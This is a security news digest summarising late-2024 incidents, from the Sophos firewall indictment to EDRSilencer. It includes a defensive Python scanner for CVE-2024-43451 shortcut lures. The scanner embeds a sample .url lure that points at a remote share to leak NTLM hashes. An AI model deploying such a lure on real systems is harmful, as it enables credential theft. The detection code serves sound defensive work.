U.S. Charges Chinese Hacker for Exploiting Zero-Day in 81,000 Sophos Firewalls

December 11, 2024 at 01:36AM The U.S. government has charged Chinese national Guan Tianfeng with compromising tens of thousands of Sophos firewalls in 2020 by exploiting a then-unpatched vulnerability, CVE-2020-12271, a pre-authentication SQL injection in the firewall's management interface that led to remote code execution. He allegedly conspired to access the devices and exfiltrate data, and some of the compromised firewalls belonged to operators of U.S. critical infrastructure. The Treasury Department sanctioned his employer, Sichuan Silence Information Technology, which the government links to Chinese intelligence services. ### Meeting Takeaways from …

US names Chinese national it alleges was behind 2020 attack on Sophos firewalls

December 11, 2024 at 12:06AM The US Treasury and Justice Departments have named a Chinese firm, Sichuan Silence, and one of its employees, Guan Tianfeng, as responsible for the 2020 exploitation of a zero-day in Sophos firewalls. The indictment alleges the group developed and tested the exploit and then used it to deliver malware to roughly 81,000 devices worldwide. The State Department has announced a reward for information on those involved, and Treasury has imposed sanctions on the company and the individual. ### Meeting Takeaways …

Attackers Can Use QR Codes to Bypass Browser Isolation

December 9, 2024 at 03:03PM Mandiant researchers have demonstrated a command-and-control channel that survives browser isolation by encoding data in QR codes: the isolated browser renders an attacker-controlled page carrying a QR code, the rendered pixels are streamed to the endpoint as usual, and an implant on that endpoint reads the code off the screen to receive the operator's commands. The channel is slow and low-bandwidth, limited by rendering latency and by how much data a single QR code can carry. Mandiant still endorses browser isolation as a …

Fortify your data

November 26, 2024 at 10:02AM Ransomware attacks are increasing, prompting the White House to convene international discussions. IBM's answer is to push detection down into the storage layer: its storage arrays use computational storage in the flash modules to watch I/O patterns and flag ransomware-style bulk encryption at the block level, independently of any host-side agent. Catching the encryption early lets organizations respond sooner and narrows both the damage and the recovery effort after an attack. **Meeting …

Microsoft patches Windows zero-day exploited in attacks on Ukraine

November 13, 2024 at 04:37PM Suspected Russian hackers exploited a Windows vulnerability, CVE-2024-43451, against Ukrainian entities before Microsoft patched it. The flaw is an NTLM hash disclosure: a malicious file delivered by phishing email makes Windows reach out to an attacker-controlled server and authenticate, leaking the user's NTLMv2 hash, which can then be relayed or cracked offline. Microsoft confirmed that triggering it requires only minimal interaction (selecting, right-clicking or deleting the file, without opening it) and that all supported Windows versions were affected, prompting CISA to issue a security …
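A defender reading the item above will want a way to find lures of this shape on a file share or in a mail quarantine. The script below is an added example written for this digest, not code from Microsoft, CISA or the researchers who reported the campaign. It assumes the lure is a Windows Internet Shortcut (`.url`) whose `URL=`, `IconFile=` or `WorkingDirectory=` field points at a remote host over UNC or `file://`, which is the trigger Explorer resolves without the user opening the file; the two shortcut bodies embedded in it are constructed samples, and the 203.0.113.x address is a documentation range, not a real attacker host.

```python
"""Flag .url (Internet Shortcut) files whose fields reference a remote host.

Added example for this digest (assumption: the lure shape matches the
CVE-2024-43451 reports, i.e. a shortcut whose URL/IconFile/WorkingDirectory
points at an attacker-controlled share). Sample shortcuts below are constructed.
"""
import configparser
from pathlib import Path
from urllib.parse import urlparse

# Fields Explorer may resolve while merely rendering or inspecting the file.
# configparser lowercases option names, so these are compared in lowercase.
WATCHED_FIELDS = ("url", "iconfile", "workingdirectory")


def is_remote_target(field: str, value: str) -> bool:
    """True if `value` would make Windows open a connection to another host."""
    v = value.strip().strip('"')
    if v.startswith("\\\\") or v.startswith("//"):
        return True  # UNC path: SMB session and NTLM negotiation follow
    parsed = urlparse(v)
    if parsed.scheme == "file":
        # file:///C:/... has no host and stays local; file://host/... does not
        return parsed.netloc not in ("", "localhost", "127.0.0.1")
    # A web address is the normal content of URL= and is not flagged there, but
    # an icon or working directory fetched over HTTP(S) (WebDAV) is suspicious.
    return field != "url" and parsed.scheme in ("http", "https")


def scan_shortcut(text: str) -> list[tuple[str, str]]:
    """Return (field, value) pairs from one .url body that point off-host."""
    cp = configparser.RawConfigParser(strict=False)  # tolerate duplicate keys
    cp.read_string(text)
    hits = []
    for section in cp.sections():
        for key, value in cp.items(section):
            if key in WATCHED_FIELDS and is_remote_target(key, value):
                hits.append((key, value))
    return hits


def scan_tree(root: str) -> dict[str, list[tuple[str, str]]]:
    """Walk a directory and report every .url file with a remote reference."""
    findings = {}
    for path in Path(root).rglob("*.url"):
        try:
            body = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        hits = scan_shortcut(body)
        if hits:
            findings[str(path)] = hits
    return findings


# Constructed sample: the shape of a hash-leaking lure.
LURE = r"""[InternetShortcut]
URL=file://203.0.113.10/share/invoice.pdf
IconIndex=1
IconFile=\\203.0.113.10\share\icon.ico
"""

# Constructed sample: an ordinary bookmark with a local icon.
BENIGN = r"""[InternetShortcut]
URL=https://www.example.com/
IconIndex=0
IconFile=C:\Windows\System32\SHELL32.dll
"""

if __name__ == "__main__":
    for name, body in (("lure", LURE), ("benign", BENIGN)):
        print(name, scan_shortcut(body))
```

Point `scan_tree()` at a user's Desktop, Downloads folder or an extracted mail attachment directory to triage at scale; the hits list tells you which field would have driven the outbound connection, which is what you need when deciding whether a leaked hash should be treated as compromised.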

Google Patches Two Android Vulnerabilities Exploited in Targeted Attacks

November 5, 2024 at 07:04AM Google's November Android security update fixes two vulnerabilities that the company says were exploited in limited, targeted attacks: CVE-2024-43047, a use-after-free in Qualcomm DSP drivers, and CVE-2024-43093, a privilege escalation in the Android Framework. Google urges users to install the update as soon as their device offers it. **Meeting Takeaways:** 1. **Vendor Alert:** Google has issued a warning regarding the exploitation of two vulnerabilities in …

Microsoft SharePoint RCE bug exploited to breach corporate network

November 2, 2024 at 07:40PM A Microsoft SharePoint remote code execution vulnerability, CVE-2024-38094, is being exploited in the wild for initial access. In the intrusion Rapid7 investigated, the attackers used it to compromise an on-premises SharePoint server, then disabled security tooling and moved laterally through the network. The flaw requires an authenticated account with Site Owner rights, so credential hygiene matters alongside patching; Rapid7 urges administrators to apply the July 2024 updates that fix it without delay. **Meeting Takeaways** …

New tool bypasses Google Chrome’s new cookie encryption system

October 28, 2024 at 05:08PM Security researcher Alexander Hagenah has published a tool that bypasses the App-Bound Encryption Google added to Chrome to protect cookies and saved credentials, recovering them in plaintext from the local profile. The technique is similar to what several infostealer families already use, but a public, ready-to-run implementation lowers the bar further for anyone storing sensitive data in the browser. Google's response has been that the tool still needs administrator rights on the host, which is the level of access App-Bound Encryption was designed to force an attacker to obtain. Google is aware of the …

Anti-Bot Services Help Cybercrooks Bypass Google ‘Red Page’

October 21, 2024 at 11:32AM Cybercriminals are buying anti-bot services, sold on dark-web forums, to keep phishing pages off Google's Safe Browsing "Red Page" warning. The services fingerprint each visitor and serve harmless content to security crawlers while showing the real phishing page to victims, using cloaking, CAPTCHA gates and similar checks. Because the scanners never see the malicious page, detection and takedown lag behind, raising the risk for individuals and enterprises alike. **Meeting Takeaways: …

Bad Actors Manipulate Red-Team Tools to Evade Detection

October 16, 2024 at 04:09PM EDRSilencer, an open-source tool built for red-team operations, is being used by threat actors to blind endpoint security: it adds Windows Filtering Platform (WFP) filters that block the outbound network traffic of 16 common EDR agents, so the sensor keeps running but its telemetry and alerts never reach the management console. Because the agent still looks healthy on the host, the tampering is easy to miss; researchers advise organizations to monitor for unexpected WFP filter creation and to invest in detection and threat-hunting that does not depend solely on what the EDR console shows. ### Meeting Takeaways: 1. …